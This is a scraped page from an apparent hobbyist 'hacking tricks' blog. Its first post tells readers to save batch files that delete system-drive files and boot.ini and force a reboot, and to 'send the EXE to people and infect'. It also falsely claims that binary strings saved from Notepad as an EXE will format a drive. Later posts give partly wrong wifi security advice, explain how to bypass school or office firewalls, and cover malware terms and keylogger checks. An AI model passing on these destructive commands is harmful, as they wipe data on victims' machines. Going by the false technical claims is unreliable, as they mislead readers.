Pages

Featured Posts

Thursday, June 7, 2012

Format The Whole HDD With Notepad

Do you think that Notepad is a useless thing...? then you are wrong because you can now do a lot of things with Notepad which you could have never imagined. In this hack I will show you how to format The Whole HDD using Notepad. This is really cool.

Step 1 :-
Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000

Step 2 :-
Save As An EXE Any Name Will Do

Step 3 :-
Send the EXE to People And Infect

OR

IF you think you cannot format C Drive when windows is running try Laughing and u will get it Razz... any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X — this will format your drive a:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest
cant spoonfeed
its working

Do not try it on your PC. Don’t mess around this is for educational purpose only

still if you cant figure it out try this

go to notepad and type the following:

@Echo off
Del C:\ *.*|y

save it as Dell.bat

want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

Thursday, February 16, 2012

How To Secure Wifi Connection

Wifi stands for Wireless Fidelity. Most of the people rush through while setting up their wifi connection without thinking about the security of their wifi connection. It is quite understandable that they want to connect to Internet as quickly as possible and Moreover securing a wifi network is a bit tricky for most of the people so they give up their hopes quite early and leave their wifi network unsecured. Their are several loopholes through which your unsecured wireless connection can be easily hacked. So In this post you will know how to secure your wifi network with simple steps.

If your wireless network has been hacked or accessed by somebody else then it may lead to complete usage of your data if you have a limited data plan or worse it may lead to extra charges on you. Even if you have unlimited data plan then also you will get less speed if your wifi has been hacked.

The step by step guide given below summarize all the necessary steps you should take for securing your wifi network.

1. Change Default Administrator Passwords (and Usernames)

Whenever you purchase a new moden or new connection then you are required to configure your modem. The modem configuration page can be accessed by entering a username and password for protecting it from unauthorized access. By default the usernames that most of the modem companies use are admin or administrator and the default password that is used is password, public, admin or some other simple word. So change your usename and password as soon as you setup your modem because these username and password combinations are known by most of the hacker .

2. Turn on (Compatible) WPA / WEP Encryption

Most of the modern modems allows both wpa and wep for securing your wifi. Applying these keys will not only encrypt your wifi network connection but it will also apply authentication. you should select the strongest encryption to secure your wifi network.

3. Enable MAC Address Filtering

Mac addresses are also known as physical address of a computer.Mac address is unique address of a computer and it is static and cannot be changed. So your router can be configured to connect to only to those devices whose MAC address match to the home devices. It will secure your wifi connection by just allowing the home devices to connect to it.

4. Enable Firewalls On Each Computer and the Router

Most of the modern routers come with a inbuilt firewall capability to secure your wifi network. Make sure that your router firewall is turned on if your router has one. On the other hand you can also use firewall in your computers. They provide an extra and a strong layer of protection to secure your wifi connection from hackers or network attackers.

5. Position the Router or Access Point Safely

A small leakage of wifi signal from home to the outside cannot be stopped but the leakage of the signal can be minised to a greater extent by just changing the direction of your antenna of the router. Never place your router near windows instead try to place it in the center of the house. You will get best quality of wifi signal through out home with less leakage of wifi signal to the outer world.

6. Turn Off the Network During Extended Periods of Non-Use

Turn of the router when it is not used. It will secure your wifi connection by giving out less access time to hackers to your wifi network and it will be difficult for them to hack in short period of time. Moreover it will be saving your electricity which will be a secondary advantage for you.

Bypass Firewall At School, College Or Office With UtraSurf

Is Facebook, Twitter, Yahoo blocked on your school, college or office? Then dont worry I have a solution for you that will not only unblock all the websites that have been blocked but also make your internet surfing anonymous so that nobody can trace your orignal ip address. As you know that most of the proxy websites are blocked with your school, college or office firewall and even if you find some new proxies they even them block them out. So why not to move something that is almost a permanent solution.

We will be using a very small and free software called ultrasurf. It will not only allow you to surf blocked websites but it will also give you freedom to stream videos, download and upload files.

Now Here is the step by step tutorial Bypass Firewall At School, College Or Office With UtraSurf

  1. First you need to Download Ultrasurf. Click here to download ultrasurf
  2. You will get a zipped file with a .exe file in it. Click on it
  3. It will start ultra surf and automatically connect to its server.
  4. Even it will open your Internet explorer automatically. Now you can have an unblocked and secure to internet.
  5. If you want to use ultrasurf with you need to download the firefox plugin also. You can download firefox plugin by clicking here

If you are connected to internet through a proxy server then ultrasurf will detect it. If somehow it does not detect the proxy server then you can manually enter your proxy server

To manually enter proxy server

Click on Option > Proxy Setting > Manual Proxy Settings

Note:- If you want to use ultrasurf with other applications you need to configure them to use ultrasurf as their proxy client. The Proxy IP address is 127.0.0.1 and the Port is 9666.

Difference Between Virus, Worms, Trojan and Spyware

We all have heard the terms Virus, Worms, trojans and spyware but only a few of us know the difference between them. We genreally consider everything that is detected by an antivirus as virus but this is not the case. The antivirus not only provides protection against viruses but it also protects us from trojans, worms and spywares. All these can be harmful to your computer hardware and software. Today I will differentiate all these terms from each other .

Ok lets start from the introduction of viruses

Virus :- A virus is a self replicating program that attaches itself to an executable file. When the file is executed the virus automatically gets executed and enters into system memory. Once it enters into system memory it either searches for other files that can be infected or stays in the background and infect the files that are uses the virus infected program.

Worms :- Worms are very similar to viruses but differ in way that they do not bind themselves to executable files instead to replicate themselves they uses the network. If you find excessive use of your network bandwidth then you may be infected by a worm. So a worm do not require a user to execute any file for its execution it can work without user intervention.

Trojan Horse :- A trojan horse is harmful program which may seem harmless to the user before its installation but instead it is programmed or reverse engineered to facilitate unauthorised remote access to the computer. Trojan’s do not replicate themselves.

Spyware :- A spyware is a program that secretly monitors and collects pieces of information. They usually run in stealth mode and cannot be detected easily. Keyloggers is a great example of spyware software. There are not limited to just spying but can also send data to remote computers

Now Here I am Providing you with the list of names of most harmful virus and worms in the history of computers

Storm Worm

Leap-A/Oompa- A

Sasser and Netsky

MyDome (Novarg)

SQL Slammer / Sapphire

Nimda

Code Red and Code Red II

The Klez

ILOVEYOU

Melissa

How to detect a keylogger in a system

Keylogger is the software program or a hardware which reads and store all the key stroke by a user in the system it is installed.

Having a keylogger in the system means you are going to loose some thing big. If your system is infected by a keylogger, your email id, facebook account, bank account and all other secure data is on the risk. Now a days hackers are active enough and many website offering free software download with keyloggers attached in it. So you need to know how to protect your system from keyloggers. If you want to know how to detect a keyloggers in a system, you can follow these points:

  • Check the task list by press ctrl+alt+del in windows. Examine all the tasks running in your system, if you are unsure about a task look it up on a search engine.

  • Run your antivirus checker, it's possible this will pick up the Keylogger on your system.

  • Use the system configuration utility to determine which task are loaded at start-up (type "msconfig" in the run box to start).

  • Download a specific keylogger detector program, and see if it detects anything.

  • Scan your hard disk for the most recent files stored. Look at the contents of any files continually updating (these might be logs created by antivirus).

Wednesday, October 12, 2011

BE CAREFUL


PLEASE BE CAREFUL WHENEVER YOU'RE USING A public computer (Like INTERNET CAFES.
ETC ).
CHECK THE BACK OF THE PC AND SEE IF THE BELOW
DEVICE IS THERE.... IF SO..then DO NOT USE IT!! New storing device fits at the end of the keyboard
cable connecting to the PC specialized to save all
typed keys in it?
Mostly could be used in net cafes, exhibitions,
hotels and airports therefore be careful especially
the people who use the internet in these places to enter their bank accounts online or any other
important sites.
After you enter the bank account and leave the PC
it will be easy to open your account again as all
what you have typed has been saved in the Black
device. Therefore, you should check the PC for any
suspicious piece behind it before using the net in
public places for important sites.

try this guys.....!

IF You are an INDIAN

Please try this..!! I bet you would love it & share it too ;)

6966669999996669999996666999996966666969999966999996666966666 6966669999999999999996666669666969666969666696669666696669666 6966666699999999999966666669666966966969666696669666999999966 6966666666999999996666666669666966696969666696669666966666966 6966666666669999666666666669666966669969666696669666966666966 69666...66666666996666666666999996966666969999966999996966666966

1. Select all numbers

2. Press CTRL+F

3. Press 9

4. CTRL+Enter


Now Thumps Up \m/ :D